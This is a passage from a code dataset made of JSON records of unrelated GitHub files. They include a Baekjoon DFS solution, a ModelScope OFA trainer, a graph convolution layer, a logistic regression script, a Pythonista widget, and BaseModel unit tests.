as response:\r\n if response.status == HTTPStatus.MULTI_STATUS:\r\n data = await response.json()\r\n items: list[dict[str, Any]] = data['processed']['items']\r\n return items\r\n\r\n return []\r\n\r\n def _get_url(self, path: str, **kwargs: str) -> str:\r\n \"\"\"Return full url for the given path.\r\n\r\n Args:\r\n path (str): Relative path.\r\n kwargs (str): Path params.\r\n\r\n Returns:\r\n str: Full url.\r\n \"\"\"\r\n return self.base_url + path.format(**kwargs)\r\n","repo_name":"butvinm/deta_py","sub_path":"deta_py/deta_base/async_base.py","file_name":"async_base.py","file_ext":"py","file_size_in_byte":9918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73403520008","text":"# https://www.acmicpc.net/problem/4963\n\n# 섬(덩어리)의 개수\n\n# 대각선에 섬이 있어도 인접하다고 써 있으므로\n# 8방향 탐색하는 DFS를 설계해야 함\n\n\n\nimport sys\nsys.stdin = open(\"4963.txt\")\n\n# [상하좌우+대각선 델타값]\n# 특정 섬 (x,y)를 기준으로 할 때, 이로부터 탐색해야 하는 8방향\noctagon = [(-1,-1),(-1,0),(-1,1),(0,-1),(0,1),(1,-1),(1,0),(1,1)]\n\nwhile True:\n # 각 테스트 케이스 마다 지도의 넓이(w), 높이(h)가 주어짐\n w, h = map(int, input().split())\n # 종료 조건: w, h 입력 값이 0, 0 일 때\n if not w and not h:\n break\n # if w == 0 and h == 0:\n # break 이런 식으로 종료조건을 작성해도 됨\n\n # 둘째 줄부터 h개의 줄에는 지도가 주어진다.\n matrix = [list(map(int,input().split())) for _ in range(h)]\n\n # w(너비)*h(높이)로 입력된 matrix 는 이차원 격자로,\n # 이중 for문 작성해서 x,y 좌표가 매칭되는 stack 작성\n # matrix[i][j] = 0 이면 바다가 등장해서 섬이 끊긴 것 cnt += 1\n cnt = 0\n for i in range(h):\n for j in range(w):\n if matrix[i][j]:\n stack = [(i,j)]\n matrix[i][j] = 0\n cnt += 1\n\n # 스택이 빌 때까지(돌아갈 곳이 없을 때까지) 반복:\n while stack:\n # 현재 방문 정점(후입선출)\n x,y = stack.pop()\n\n # 델타값을 이용한 상하좌우+대각선(octagon) 탐색\n # matrix 에서 뽑은 x,y 값의 쌍(stack)에 대해\n # octagon 의 변량값 r,c를 각각 더하면서 8방향 탐색\n for r,c in octagon:\n dx = x + r\n dy = y + c\n\n # dx, dy 값이 경계값에 맞게 들어가면:\n # = 이동할 수 있는 있는 곳에 있다면:\n # stack 에 저장해서 계속 8방향 탐색하며 나아갈 수 있게하기\n # 이때 matrix[dx][dy] 는 아직 방문하지 않았으므로 False 처리\n if h > dx >= 0 and w > dy >= 0 and matrix[dx][dy]:\n stack.append((dx, dy))\n matrix[dx][dy] = False\n\n # 각 테스트 케이스에 대해서, 섬의 개수를 출력한다.\n print(cnt)\n\n\n'''\n[DFS 3가지 패턴]\n1. 상, 하, 좌, 우 패턴\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\n2. 대각선 + 상, 하, 좌, 우 패턴\ndx = [-1, -1, -1, 0, 0, 1, 1, 1]\ndy = [-1, 0, 1, -1, 1, -1, 0, 1]\n3. 
대각선 패턴\ndx = [-1, -1, 1, 1]\ndy = [-1, 1, -1, 1]\n'''","repo_name":"code-sum/Algorithm","sub_path":"BOJ/220811/4963.py","file_name":"4963.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"22864424348","text":"import math\nimport os\nimport shutil\nimport tempfile\nfrom functools import partial\nfrom shutil import ignore_patterns\nfrom typing import Callable, Dict, Optional, Tuple, Union\n\nimport json\nimport torch\nfrom torch import distributed as dist\nfrom torch import nn\nfrom torch.utils.data import Dataset\n\nfrom modelscope.hub.file_download import model_file_download\nfrom modelscope.metainfo import Trainers\nfrom modelscope.models.base import Model, TorchModel\nfrom modelscope.msdatasets.ms_dataset import MsDataset\nfrom modelscope.preprocessors.base import Preprocessor\nfrom modelscope.preprocessors.multi_modal import OfaPreprocessor\nfrom modelscope.preprocessors.ofa.utils.collate import collate_fn\nfrom modelscope.trainers import EpochBasedTrainer\nfrom modelscope.trainers.builder import TRAINERS\nfrom modelscope.trainers.optimizer.builder import build_optimizer\nfrom modelscope.trainers.parallel.utils import is_parallel\nfrom modelscope.utils.config import Config\nfrom modelscope.utils.constant import (DEFAULT_MODEL_REVISION, ConfigKeys,\n Invoke, ModeKeys, ModelFile)\nfrom .ofa_trainer_utils import (AdjustLabelSmoothedCrossEntropyCriterion,\n get_schedule, recursive_overwrite)\n\n\n@TRAINERS.register_module(module_name=Trainers.ofa)\nclass OFATrainer(EpochBasedTrainer):\n r\"\"\"\n OFA trainer for MaaS.\n\n Args:\n model (`str`): A model dir or a model id to be loaded\n cfg_file (`str`, **optional**, default to `None`):\n A config dir\n cfg_modify_fn (`Callable`, **optional**, default to `None`):\n A function which can rebuild the config file.\n arg_parse_fn (`Callable`, **optional**, default to `None`):\n Same as ``parse_fn`` in :obj:`Config.to_args`.\n data_collator (`Callable`, **optional**, default to `None`):\n The function to use to form a batch from a list of elements\n of `train_dataset` or `eval_dataset`.\n train_dataset (:obj:`MsDataset` or :obj:`Dataset`, **optional**, default to `None`):\n Dataset for training.\n eval_dataset (:obj:`MsDataset` or :obj:`Dataset`, **optional**, default to `None`):\n Dataset for evaluation.\n preprocessor (:obj:`Preprocessor`, **optional**, default to `None`):\n The optional preprocessor.\n NOTE: If the preprocessor has been called before the dataset fed into this trainer by user's custom code,\n this parameter should be None, meanwhile remove the 'preprocessor' key from the cfg_file.\n Else the preprocessor will be instantiated from the cfg_file or assigned from this parameter and\n this preprocessing action will be executed every time the dataset's __getitem__ is called.\n model_revision (`str`, **optional**, default to `None`):\n The revision used when the model_name_or_path is\n a model id of the remote hub. 
default `None`.\n seed (`int`, **optional**, default to `42`):\n The optional random seed for torch, cuda, numpy and random.\n \"\"\"\n\n def __init__(\n self,\n model: Optional[Union[TorchModel, nn.Module, str]] = None,\n cfg_file: Optional[str] = None,\n cfg_modify_fn: Optional[Callable] = None,\n arg_parse_fn: Optional[Callable] = None,\n data_collator: Optional[Union[Callable, Dict[str,\n Callable]]] = None,\n train_dataset: Optional[Union[MsDataset, Dataset]] = None,\n eval_dataset: Optional[Union[MsDataset, Dataset]] = None,\n preprocessor: Optional[Union[Preprocessor,\n Dict[str, Preprocessor]]] = None,\n optimizers: Tuple[torch.optim.Optimizer,\n torch.optim.lr_scheduler._LRScheduler] = (None,\n None),\n model_revision: Optional[str] = DEFAULT_MODEL_REVISION,\n seed: int = 42,\n **kwargs):\n model = Model.from_pretrained(\n model, revision=model_revision, invoked_by=Invoke.TRAINER)\n model_dir = model.model_dir\n self.cfg_modify_fn = cfg_modify_fn\n\n work_dir = kwargs.get('work_dir', 'workspace')\n os.makedirs(work_dir, exist_ok=True)\n ignore_file_set = set()\n if cfg_file is not None:\n cfg_file = self.get_config_file(cfg_file)\n dst = os.path.abspath(\n os.path.join(work_dir, ModelFile.CONFIGURATION))\n src = os.path.abspath(cfg_file)\n if src != dst:\n shutil.copy(src, work_dir)\n ignore_file_set.add(ModelFile.CONFIGURATION)\n recursive_overwrite(\n model_dir, work_dir, ignore=ignore_patterns(*ignore_file_set))\n cfg_file = os.path.join(work_dir, ModelFile.CONFIGURATION)\n cfg = self.rebuild_config(Config.from_file(cfg_file))\n if cfg_modify_fn is not None:\n cfg = self.cfg_modify_fn(cfg)\n with open(cfg_file, 'w') as writer:\n json.dump(dict(cfg), fp=writer, indent=4)\n if preprocessor is None:\n preprocessor = {\n ConfigKeys.train:\n OfaPreprocessor(\n model_dir=work_dir, mode=ModeKeys.TRAIN, no_collate=True),\n ConfigKeys.val:\n OfaPreprocessor(\n model_dir=work_dir, mode=ModeKeys.EVAL, no_collate=True),\n }\n # use torchrun launch\n world_size = int(os.environ.get('WORLD_SIZE', 1))\n epoch_steps = math.ceil(\n len(train_dataset) / # noqa\n (cfg.train.dataloader.batch_size_per_gpu * world_size)) # noqa\n cfg.train.lr_scheduler.num_train_steps = epoch_steps * cfg.train.max_epochs\n cfg.train.criterion.tokenizer = model.tokenizer\n self.criterion = AdjustLabelSmoothedCrossEntropyCriterion(\n cfg.train.criterion)\n if optimizers[0] is None:\n optimizer = build_optimizer(model, cfg=cfg.train.optimizer)\n else:\n optimizer = optimizers[0]\n if optimizers[1] is None:\n scheduler_class, scheduler_args = get_schedule(\n cfg.train.lr_scheduler)\n if scheduler_class is not None:\n lr_scheduler = scheduler_class(**{'optimizer': optimizer},\n **scheduler_args)\n else:\n lr_scheduler = None\n else:\n lr_scheduler = optimizers[1]\n optimizers = (optimizer, lr_scheduler)\n if data_collator is None:\n data_collator = partial(\n collate_fn,\n pad_idx=model.tokenizer.pad_token_id,\n eos_idx=model.tokenizer.eos_token_id,\n )\n if 'launcher' not in kwargs and cfg.train.get('launcher', None):\n kwargs['launcher'] = cfg.train.launcher\n if 'use_fp16' not in kwargs and cfg.train.get('use_fp16', False):\n kwargs['use_fp16'] = cfg.train.use_fp16\n kwargs['to_tensor'] = False\n super().__init__(\n model=model,\n cfg_file=cfg_file,\n arg_parse_fn=arg_parse_fn,\n cfg_modify_fn=cfg_modify_fn,\n data_collator=data_collator,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n preprocessor=preprocessor,\n optimizers=optimizers,\n seed=seed,\n **kwargs,\n )\n\n def rebuild_config(self, cfg: 
Config):\n r\"\"\"\n rebuild config if `cfg_modify_fn` is not `None`.\n \"\"\"\n if self.cfg_modify_fn is not None:\n cfg = self.cfg_modify_fn(cfg)\n return cfg\n\n def get_config_file(self, config_file: str):\n r\"\"\"\n support local file/ url or model_id with revision\n \"\"\"\n if os.path.exists(config_file):\n return config_file\n else:\n temp_name = tempfile.TemporaryDirectory().name\n if len(config_file.split('#')) == 2:\n model_id = config_file.split('#')[0]\n revision = config_file.split('#')[-1].split('=')[-1]\n else:\n model_id = config_file\n revision = DEFAULT_MODEL_REVISION\n file_name = model_file_download(\n model_id,\n file_path=ModelFile.CONFIGURATION,\n revision=revision,\n cache_dir=temp_name)\n return file_name\n\n def train_step(self, model, inputs):\n r\"\"\"\n A single training step.\n\n step 1. Let the model in a trainable state.\n step 2. Execute the criterion function.\n step 3. Update the logging variable's value.\n step 4. Update the training result.\n\n Args:\n model (:obj:`torch.nn.Module` or :obj:`TorchModel`): The model to be run.\n inputs (`dict`): model inputs.\n \"\"\"\n model = model.module if self._dist or is_parallel(model) else model\n model.train()\n loss, sample_size, logging_output = self.criterion(model, inputs)\n train_outputs = {'loss': loss}\n # add model output info to log\n if 'log_vars' not in train_outputs:\n default_keys_pattern = ['loss']\n match_keys = set([])\n for key_p in default_keys_pattern:\n match_keys.update(\n [key for key in train_outputs.keys() if key_p in key])\n log_vars = {}\n for key in match_keys:\n value = train_outputs.get(key, None)\n if value is not None:\n if dist.is_available() and dist.is_initialized():\n value = value.data.clone()\n dist.all_reduce(value.div_(dist.get_world_size()))\n log_vars.update({key: value.item()})\n self.log_buffer.update(log_vars)\n else:\n self.log_buffer.update(train_outputs['log_vars'])\n self.train_outputs = train_outputs\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/trainers/multi_modal/ofa/ofa_trainer.py","file_name":"ofa_trainer.py","file_ext":"py","file_size_in_byte":10135,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"38415594294","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom scipy.sparse.linalg import eigs\nfrom model.att import AttLayer\n\nclass AVWGCN(nn.Module):\n def __init__(self, cheb_polynomials, L_tilde, dim_in, dim_out, cheb_k, embed_dim):\n super(AVWGCN, self).__init__()\n self.cheb_k = cheb_k\n self.cheb_polynomials = cheb_polynomials\n self.L_tilde = L_tilde\n self.weights_pool = nn.Parameter(torch.FloatTensor(embed_dim, cheb_k, dim_in, dim_out))\n self.bias_pool = nn.Parameter(torch.FloatTensor(embed_dim, dim_out))\n \n # for existing graph convolution\n # self.init_gconv = nn.Conv1d(dim_in, dim_out, kernel_size=5, padding=0)\n self.init_gconv = nn.Linear(dim_in, dim_out)\n self.gconv = nn.Linear(dim_out * cheb_k, dim_out)\n self.dy_gate1 = AttLayer(dim_out)\n self.dy_gate2 = AttLayer(dim_out)\n\n def forward(self, x, node_embeddings, L_tilde_learned):\n #x shaped[B, N, C], node_embeddings shaped [N, D] -> supports shaped [N, N]\n #output shape [B, N, C]\n b, n, _ = x.shape\n # 0) learned cheb_polynomials\n node_num = node_embeddings.shape[0]\n\n # L_tilde_learned = F.softmax(F.relu(torch.mm(node_embeddings, node_embeddings.transpose(0, 1))), dim=1)\n # L_tilde_learned = torch.matmul(L_tilde_learned, self.L_tilde) * L_tilde_learned\n\n support_set 
= [torch.eye(node_num).to(L_tilde_learned.device), L_tilde_learned]\n #default cheb_k = 3\n for k in range(2, self.cheb_k):\n support_set.append(torch.matmul(2 * L_tilde_learned, support_set[-1]) - support_set[-2])\n\n # 1) convolution with learned graph convolution (implicit knowledge)\n supports = torch.stack(support_set, dim=0)\n weights = torch.einsum('nd,dkio->nkio', node_embeddings, self.weights_pool) #N, cheb_k, dim_in, dim_out\n bias = torch.matmul(node_embeddings, self.bias_pool) #N, dim_out\n x_g = torch.einsum(\"knm,bmc->bknc\", supports, x) #B, cheb_k, N, dim_in\n x_g = x_g.permute(0, 2, 1, 3) # B, N, cheb_k, dim_in\n x_gconv0 = torch.einsum('bnki,nkio->bno', x_g, weights) + bias #b, N, dim_out\n\n # 2) convolution with existing graph (explicit knowledge)\n graph_supports = torch.stack(self.cheb_polynomials, dim=0) # [k, n, m]\n x = self.init_gconv(x)\n x_g1 = torch.einsum(\"knm,bmc->bknc\", graph_supports, x)\n x_g1 = x_g1.permute(0, 2, 1, 3).reshape(b, n, -1) # B, N, cheb_k, dim_in\n x_gconv1 = self.gconv(x_g1)\n\n # 3) fusion of explit knowledge and implicit knowledge\n x_gconv = self.dy_gate1(F.leaky_relu(x_gconv0).transpose(1,2)) + self.dy_gate2(F.leaky_relu(x_gconv1).transpose(1,2))\n # x_gconv = F.leaky_relu(x_gconv0) + F.leaky_relu(x_gconv1)\n \n return x_gconv.transpose(1,2)\n","repo_name":"ant-research/RGSL","sub_path":"model/RGCN.py","file_name":"RGCN.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"16"} +{"seq_id":"34090235693","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport json\nimport time\nfrom keras.models import Sequential\nfrom keras.layers.recurrent import LSTM, SimpleRNN, GRU\nfrom keras.layers import Dense, Dropout, Activation\nfrom os import getcwd, environ, listdir, mkdir, path\nfrom keras.optimizers import rmsprop\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import load_model\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\nfrom sklearn.externals import joblib\nfrom scipy.ndimage import convolve\nfrom sklearn import linear_model, datasets, metrics\n#from sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.pipeline import Pipeline\n\n\n\nclass logistic(object):\n \n def setColumns(self):\n \n # Load Datad\n self.PATH = getcwd()\n f = open(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.info', 'r')\n p = open(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.param', 'r')\n columns = f.read().splitlines()\n t = json.load(p)\n \n self.in_learning_rate = float(t['learning_rate'])\n self.label_name = t['target']\n #self.in_n_iter = int(t['n_iter'])\n #self.in_n_components = int(t['n_components'])\n #self.in_logistic_c = float(t['logistic_c'])\n #self.in_learning_rate = 0.01\n #self.in_n_iter = 30\n #self.in_n_components = 63\n #self.in_logistic_c = 6000.0\n #self.label_name = 'label'\n\n #f.close()\n #p.close()\n\n def pre_processing_for_data(self, data_file_path):\n \n #read data\n data_pd = pd.read_csv(data_file_path)\n #assign features \n features_pd = data_pd\n #features_pd = features_pd.drop('label',1)\n \n if self.label_name in features_pd:\n features_pd = features_pd.drop(self.label_name,1)\n \n self.data_dim = len(features_pd.columns)\n self.in_n_components = len(features_pd.columns)\n self.samples = len(features_pd)\n #crate input data\n X_val = np.array(features_pd)\n #adjust_offset_value = 
len(X_val)-(len(X_val) % self.timesteps)\n #X_val = X_val[0:adjust_offset_value]\n #X_val = X_val.reshape(-1, self.timesteps, self.data_dim)\n #assign label\n #label_pd = data_pd['label']\n if self.label_name is not None:\n if self.label_name in data_pd:\n label_pd = data_pd[self.label_name]\n #calculate label list\n label_list = list(set(np.reshape(label_pd.values,(-1,))))\n #create output data\n #Y_val = []\n #loop for number of data\n #for count, i in enumerate(label_pd):\n # idx = find_matching_index(label_list,i)\n # Y_val.append(np.reshape(vectorized_Y_data(idx,len(label_list)),(-1,)))\n Y_val = np.array(label_pd)\n #Y_val = to_categorical(Y_val)\n else:\n Y_val = 0\n else:\n Y_val = 0\n \n #print(np.shape(X_val))\n #print(np.shape(Y_val))\n return X_val, Y_val\n\n \n def training(self):\n #init network configuration\n self.setColumns()\n #preprocessing data\n #X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/py/rbm/test.csv'))\n X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.csv'))\n \n \n #create model\n logistic = linear_model.LogisticRegression()\n \n logistic.C = self.in_learning_rate\n \n logistic.fit(X_train, Y_train)\n \n acc, recall, precision, f1_score = cal_matrics(logistic, X_train, Y_train)\n\n \n model_name = 'train_'+time.strftime(\"%Y%m_%d_%H_%M\", time.localtime())\n #save\n out = open(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.out', 'w')\n json.dump({'ntb':\n {\n 'model_name' : model_name,\n 'samples' : self.samples,\n 'accuracy' : acc,\n 'recall' : recall,\n 'precision' : precision,\n 'f1_score' : f1_score\n }\n ,\n 'tb': \n {\n #'predict' :\n }\n }, out, separators=(',',':'))\n \n if not path.exists(self.PATH + '/data/' + sys.argv[1] + '/' + model_name):\n mkdir(self.PATH + '/data/' + sys.argv[1] + '/' + model_name)\n joblib.dump(logistic, self.PATH + '/data/' + sys.argv[1] + '/' + model_name + '/' + sys.argv[1] + '.pkl')\n \n out.close()\n \n def test(self):\n \n #init network configuration\n self.setColumns()\n #preprocessing data\n #X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/py/rbm/test.csv'))\n X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[1] + '.csv'))\n \n logistic_classifier = joblib.load(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[3] + '/' + sys.argv[1] + '.pkl')\n \n # Trainig result\n #RBM_result = metrics.classification_report(\n # Y_train,\n # classifier.predict(X_train))\n acc, recall, precision, f1_score = cal_matrics(logistic_classifier, X_train, Y_train)\n \n #print()\n #print(\"Logistic regression using RBM features:\\n%s\\n\" % Logistic_result)\n \n test = open(self.PATH + '/data/' + sys.argv[1] + '/test/' + sys.argv[2] + '.test', 'w')\n json.dump({'ntb':\n {\n 'samples' : self.samples,\n 'accuracy' : acc,\n 'recall' : recall,\n 'precision' : precision,\n 'f1_score' : f1_score\n }\n ,\n 'tb': \n {\n #'predict' :\n }\n }, test, separators=(',',':'))\n test.close()\n \n def request(self):\n\n #init network configuration\n self.setColumns()\n #preprocessing data\n #X_train, Y_train = self.pre_processing_for_data(str(self.PATH + '/py/rbm/test.csv'))\n X_train, _ = self.pre_processing_for_data(str(self.PATH + '/data/' + sys.argv[1] + '/request/' + sys.argv[2] + '.csv'))\n \n logistic_classifier = joblib.load(self.PATH + '/data/' + sys.argv[1] + '/' + sys.argv[3] + '/' + sys.argv[1] + '.pkl')\n \n # Trainig result\n P = logistic_classifier.predict(X_train)\n \n 
prediction_array = []\n for i in P:\n prediction_array.append(i)\n \n \n req = open(self.PATH + '/data/' + sys.argv[1] + '/request/' + sys.argv[2] + '.req', 'w')\n json.dump({'ntb':\n {\n 'samples' : self.samples\n }\n ,\n 'tb': \n {\n 'predict' : prediction_array\n }\n }, req, separators=(',',':'))\n req.close()\n\n\ndef cal_matrics(model, X, Y):\n \n predict = model.predict(X)\n \n acc = metrics.accuracy_score(\n Y,\n predict, normalize=False,sample_weight=None)\n\n recall = metrics.recall_score(\n Y,\n predict, average='micro')\n \n precision = metrics.precision_score(\n Y,\n predict, average='micro')\n \n f1_score = metrics.f1_score(\n Y,\n predict,average='micro')\n \n return acc, recall, precision, f1_score\n\n\ndef find_matching_index(src, dst):\n for i in range(0, len(src)):\n if src[i] == dst:\n return i\n return -1\n\ndef vectorized_Y_data(j,label_num):\n e = np.zeros((label_num, 1))\n e[j] = 1.0\n return e[:]\n\ndef main():\n mylogistic = logistic()\n mylogistic.training()\n# mylogistic.test()\n# mylogistic.request()\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"myeongkil/Intelligent_cognitive_framework","sub_path":"py/logistic/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21728660798","text":"from method import method\nfrom helpers import db\nimport time\n\nclass unsubscribeGetMethod(method):\n\n def __init__(self, request, running):\n checks = [\"key\", \"line\", \"token\", \"active\"]\n super(unsubscribeGetMethod, self).__init__(request, running, checks)\n if not self.error:\n self.run()\n \n def run(self):\n self._log(\"unsubscribeGet\")\n db.Lines.update({\"_id\": self.line[\"_id\"], \"tokens.key\": self.token[\"key\"]}, {\"$set\": {\"tokens.$.active\": False}})\n if self.token[\"key\"] in self.running[self.line[\"_id\"]][\"tokens\"]:\n self.running[self.line[\"_id\"]][\"tokens\"].remove(self.token[\"key\"])\n if len(self.running[self.line[\"_id\"]][\"tokens\"]) < 1:\n db.Lines.update({\"_id\": self.line[\"_id\"]}, {\"$set\": {\"reconnect\": False, \"active\": False}})\n if self.line[\"_id\"] in self.running:\n del self.running[self.line[\"_id\"]]\n self.wa.logout()\n self._success()\n","repo_name":"aitoehigie/whatools-api","sub_path":"methods/unsubscribe.py","file_name":"unsubscribe.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23913497445","text":"import appex\nimport ui\nimport random\nfrom time import time\n\nstartTime = 0\nisRunning = False\n\n\ndef start(sender):\n\tglobal isRunning\n\tglobal startTime\n\n\tif isRunning:\n\t\tnow = time() - startTime\n\t\tsecs = now % 60.0\n\t\tlightSpeed = 340\n\t\tdistance = secs * lightSpeed\n\n\t\tsender.superview['button_label'].title = \"►\"\n\t\tsender.superview['result_label'].title = str(int(distance)) + \"m\"\n\t\tisRunning = False\n\n\telse:\n\t\tsender.superview['button_label'].title = \"◼\"\n\t\tsender.superview['result_label'].title = \"Counting\"\n\n\t\tstartTime = time()\n\t\tisRunning = True\n\n\ndef reset(sender):\n\tglobal startTime\n\tglobal isRunning\n\n\tstartTime = 0\n\tisRunning = False\n\tsender.superview['result_label'].title = \"\"\n\n\nv = ui.View(frame=(0, 0, 300, 110))\n\nlabel = ui.Button(\n\tframe=(150, 0, 150, 100),\n\tflex='lwh',\n\tfont=('<System>', 
24),\n\talignment=ui.ALIGN_RIGHT,\n\taction=reset,\n\tname='result_label')\nv.add_subview(label)\n\nbutton = ui.Button(\n\ttitle='►',\n\tfont=('<System>', 24),\n\tflex='rwh',\n\taction=start,\n\tname='button_label')\nbutton.frame = (20, 25, 50, 50)\nv.add_subview(button)\n\nappex.set_widget_view(v)\n","repo_name":"excalith/pythonista","sub_path":"Thunder.py","file_name":"Thunder.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"13776751615","text":"#!/usr/bin/python3\n\"\"\" DEfinition of the Unittest module for ‘BaseModel’ class \"\"\"\n\nimport json\nimport re\nimport os\nimport time\nimport uuid\nimport unittest\nfrom models.base_model import BaseModel\nfrom datetime import datetime\nfrom models import storage\nfrom models.engine.file_storage import FileStorage\n\n\nclass TestBaseModel(unittest.TestCase):\n \"\"\" The following are the test cases for the Basemodel class \"\"\"\n\n def setUp(self):\n \"\"\" This is for setting up test methods.\"\"\"\n pass\n\n def tearDown(self):\n \"\"\"This is for tearing down test methods.\"\"\"\n self.clearStorageData()\n pass\n\n def clearStorageData(self):\n \"\"\" This is for resetting FileStorage data.\"\"\"\n FileStorage._FileStorage__objects = {}\n if os.path.isfile(FileStorage._FileStorage__file_path):\n os.remove(FileStorage._FileStorage__file_path)\n\n def test_instantiate(self):\n \"\"\" This is to test instantiation of BaseModel class\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Assert that the instance is of the expected type\n self.assertEqual(\n str(type(bm)),\n \"<class 'models.base_model.BaseModel'>\"\n )\n\n # Assert that the instance is an instance of BaseModel\n self.assertIsInstance(bm, BaseModel)\n\n # Assert that the instance's type is a subclass of BaseModel\n self.assertTrue(issubclass(type(bm), BaseModel))\n\n def test_init_no_args(self):\n \"\"\" This is to test __init__ with no arguments\"\"\"\n self.clearStorageData()\n\n # Check that trying to create an instance with no args raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.__init__()\n error_msg = \"__init__() missing 1 required positional argument: 'self'\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_init_many_args(self):\n \"\"\"This is to test __init__ with many arguments.\"\"\"\n self.clearStorageData()\n\n # Create a list of arguments\n args = [arg for arg in range(10)]\n\n # Create a BaseModel instance with many arguments\n bm = BaseModel(*args)\n\n def test_attributes(self):\n \"\"\"This is totest attributes value for instance of a BaseModel class\"\"\"\n\n # Get the attributes for the BaseModel class\n attrs = storage.attributes()[\"BaseModel\"]\n\n # Create a BaseModel instance\n obj = BaseModel()\n\n # Check if the instance has the expected attributes & their typesmatch\n for attr_name, attr_type in attrs.items():\n self.assertTrue(hasattr(obj, attr_name))\n self.assertEqual(type(getattr(obj, attr_name, None)), attr_type)\n\n def test_datetime_created(self):\n \"\"\"This is to test if updated_at & created_at\n are current at creation\"\"\"\n\n # Get the current date and time\n current_time = datetime.now()\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Calculate the time difference between updated_at and created_at\n time_diff = bm.updated_at - bm.created_at\n\n # Check that the time difference is within an acceptable range\n self.assertTrue(abs(time_diff.total_seconds()) < 0.01)\n\n # 
Calculate the time difference between created_at and the current date\n time_diff = bm.created_at - current_time\n\n # Check that the time difference is within an acceptable range\n self.assertTrue(abs(time_diff.total_seconds()) < 0.1)\n\n def test_id(self):\n \"\"\"This is to test for unique user ids.\"\"\"\n\n # Create a list of BaseModel IDs\n id_list = [BaseModel().id for _ in range(1000)]\n\n # Check that all IDs in the list are unique\n self.assertEqual(len(set(id_list)), len(id_list))\n\n def test_save(self):\n \"\"\"This is to test the public instance method save().\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Sleep to create a time gap\n time.sleep(0.5)\n\n # Get the current date and time\n current_time = datetime.now()\n\n # Call the save() method\n bm.save()\n\n # Calculate the time difference between updated_at and the current date\n time_diff = bm.updated_at - current_time\n\n # Check that the time difference is within an acceptable range\n self.assertTrue(abs(time_diff.total_seconds()) < 0.01)\n\n def test_str(self):\n \"\"\"This is to test for __str__ method.\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Define a regular expression pattern to match the str representation\n regex = re.compile(r\"^\\[(.*)\\] \\((.*)\\) (.*)$\")\n\n # Match the string representation against the pattern\n result = regex.match(str(bm))\n\n # Check that the match is not None\n self.assertIsNotNone(result)\n\n # Check that the first group in the match is \"BaseModel\"\n self.assertEqual(result.group(1), \"BaseModel\")\n\n # Check that the second group in the match is the BaseModel's ID\n self.assertEqual(result.group(2), bm.id)\n\n # Extract 3rdgroup and replace single quotes with\n # double quotes for JSON compatibility\n\n str_data = result.group(3)\n str_data = re.sub(r\"(datetime\\.datetime\\([^)]*\\))\", \"'\\\\1'\", str_data)\n data = json.loads(str_data.replace(\"'\", '\"'))\n\n # Create a dictionary from the BaseModel's __dict__\n # & format date attributes\n obj_data = bm.__dict__.copy()\n obj_data[\"created_at\"] = repr(obj_data[\"created_at\"])\n obj_data[\"updated_at\"] = repr(obj_data[\"updated_at\"])\n\n # Check that the data from the string representation matches\n # the BaseModel's attributes\n\n self.assertEqual(data, obj_data)\n\n def test_to_dict(self):\n \"\"\"This is to test the public instance method to_dict().\"\"\"\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Set some attributes\n bm.name = \"ModelName\"\n bm.age = 25\n\n # Convert the BaseModel instance to a dictionary\n data = bm.to_dict()\n\n # Check that the dictionary contains the expected data\n self.assertEqual(data[\"id\"], bm.id)\n self.assertEqual(data[\"__class__\"], type(bm).__name__)\n self.assertEqual(data[\"created_at\"], bm.created_at.isoformat())\n self.assertEqual(data[\"updated_at\"], bm.updated_at.isoformat())\n self.assertEqual(data[\"name\"], bm.name)\n self.assertEqual(data[\"age\"], bm.age)\n\n def test_to_dict_no_args(self):\n \"\"\"This is to test to_dict() with no arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call to_dict() with no arguments raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.to_dict()\n error_msg = \"to_dict() missing 1 required positional argument: 'self'\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_to_dict_excess_args(self):\n \"\"\"This is to test to_dict() with too many arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call to_dict()\n # with too 
